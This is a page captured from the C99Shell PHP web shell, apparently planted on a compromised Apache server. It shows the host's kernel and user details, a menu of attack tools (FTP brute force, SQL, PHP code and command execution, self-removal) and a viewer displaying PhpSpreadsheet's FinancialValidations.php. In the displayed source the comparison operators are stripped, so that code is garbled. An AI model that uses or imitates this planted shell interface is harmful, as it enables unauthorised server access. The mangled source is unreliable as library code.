!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/Financial/   drwxr-xr-x
Free 13.15 GB of 57.97 GB (22.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FinancialValidations.php (3.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PhpOffice\PhpSpreadsheet\Calculation\Financial;

use 
PhpOffice\PhpSpreadsheet\Calculation\DateTimeExcel;
use 
PhpOffice\PhpSpreadsheet\Calculation\Exception;
use 
PhpOffice\PhpSpreadsheet\Calculation\Financial\Constants as FinancialConstants;
use 
PhpOffice\PhpSpreadsheet\Calculation\Information\ExcelError;

class 
FinancialValidations
{
    
/**
     * @param mixed $date
     */
    
public static function validateDate($date): float
    
{
        return 
DateTimeExcel\Helpers::getDateValue($date);
    }

    
/**
     * @param mixed $settlement
     */
    
public static function validateSettlementDate($settlement): float
    
{
        return 
self::validateDate($settlement);
    }

    
/**
     * @param mixed $maturity
     */
    
public static function validateMaturityDate($maturity): float
    
{
        return 
self::validateDate($maturity);
    }

    
/**
     * @param mixed $value
     */
    
public static function validateFloat($value): float
    
{
        if (!
is_numeric($value)) {
            throw new 
Exception(ExcelError::VALUE());
        }

        return (float) 
$value;
    }

    
/**
     * @param mixed $value
     */
    
public static function validateInt($value): int
    
{
        if (!
is_numeric($value)) {
            throw new 
Exception(ExcelError::VALUE());
        }

        return (int) 
floor((float) $value);
    }

    
/**
     * @param mixed $rate
     */
    
public static function validateRate($rate): float
    
{
        
$rate self::validateFloat($rate);
        if (
$rate 0.0) {
            throw new 
Exception(ExcelError::NAN());
        }

        return 
$rate;
    }

    
/**
     * @param mixed $frequency
     */
    
public static function validateFrequency($frequency): int
    
{
        
$frequency self::validateInt($frequency);
        if (
            (
$frequency !== FinancialConstants::FREQUENCY_ANNUAL) &&
            (
$frequency !== FinancialConstants::FREQUENCY_SEMI_ANNUAL) &&
            (
$frequency !== FinancialConstants::FREQUENCY_QUARTERLY)
        ) {
            throw new 
Exception(ExcelError::NAN());
        }

        return 
$frequency;
    }

    
/**
     * @param mixed $basis
     */
    
public static function validateBasis($basis): int
    
{
        if (!
is_numeric($basis)) {
            throw new 
Exception(ExcelError::VALUE());
        }

        
$basis = (int) $basis;
        if ((
$basis 0) || ($basis 4)) {
            throw new 
Exception(ExcelError::NAN());
        }

        return 
$basis;
    }

    
/**
     * @param mixed $price
     */
    
public static function validatePrice($price): float
    
{
        
$price self::validateFloat($price);
        if (
$price 0.0) {
            throw new 
Exception(ExcelError::NAN());
        }

        return 
$price;
    }

    
/**
     * @param mixed $parValue
     */
    
public static function validateParValue($parValue): float
    
{
        
$parValue self::validateFloat($parValue);
        if (
$parValue 0.0) {
            throw new 
Exception(ExcelError::NAN());
        }

        return 
$parValue;
    }

    
/**
     * @param mixed $yield
     */
    
public static function validateYield($yield): float
    
{
        
$yield self::validateFloat($yield);
        if (
$yield 0.0) {
            throw new 
Exception(ExcelError::NAN());
        }

        return 
$yield;
    }

    
/**
     * @param mixed $discount
     */
    
public static function validateDiscount($discount): float
    
{
        
$discount self::validateFloat($discount);
        if (
$discount <= 0.0) {
            throw new 
Exception(ExcelError::NAN());
        }

        return 
$discount;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--